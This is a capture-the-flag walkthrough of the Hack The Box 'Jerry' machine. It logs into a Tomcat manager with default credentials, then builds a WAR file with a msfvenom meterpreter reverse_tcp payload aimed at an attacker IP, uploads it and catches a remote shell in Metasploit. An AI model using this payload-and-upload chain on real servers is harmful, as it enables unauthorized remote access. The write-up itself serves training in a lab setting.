Hack The Box: Beginner Track - Jerry


This is the fourth part of the Hack The Box Beginner Track: “Jerry”.


Jerry

box jerry

Enumeration

nmap reveals only one open port, which is Tomcat 7.0.88 on port 8080:

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Supported Methods: GET POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

box jerry


Initial Foothold

The box is tagged “Default Credentials”, so let’s see if this helps us here. The tomcat login page opens at /manager/html. After entering a wrong password, we get a “403 - Access Denied” notification with a sample code how to implement the user. It lists a password and username.

box jerry

Now, if we log in again (you need to clear the cache or use a private window), we are in!

box jerry


Privilege Escalation

Googling for “Tomcat 7.0.88 exploit”, we get a couple of hits regarding remote code execution via JSP upload. Let’s see if Metasploit has something prepared:

box jerry

Unfortunately both exploit 7 and exploit 25 fail, so we might need to find a more manual approach.


Let’s create a WAR-file with msfvenom:

$  msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.74 -f war -o backupjob.war LPORT=4444

A war file is a file which distributes JAR-files and other resources. We can check the contents with jar -ft backupjob.war:

$ jar -ft backupjob.war
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
META-INF/
META-INF/MANIFEST.MF
WEB-INF/
WEB-INF/web.xml
maviljcffocdph.jsp

This means, the file that we actually need to get executed is maviljcffocdph.jsp. In order to do that, we simply need to call it (for example via curl, or the browser), using the URL given in the applications-list.

box jerry

In parallel, of course we need to have the listener ready in metasploit (use multi/handler). Now we simply call the jsp-file and we get a shell.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.74:4444 
[*] Sending stage (175686 bytes) to 10.129.75.105
[*] Meterpreter session 1 opened (10.10.14.74:4444 -> 10.129.75.105:49192) at 2022-10-28 11:58:31 -0400

meterpreter > shell
Process 2872 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>id
id
'id' is not recognized as an internal or external command,
operable program or batch file.

C:\apache-tomcat-7.0.88>

In the desktop folder of the administrator user, we can find both flags.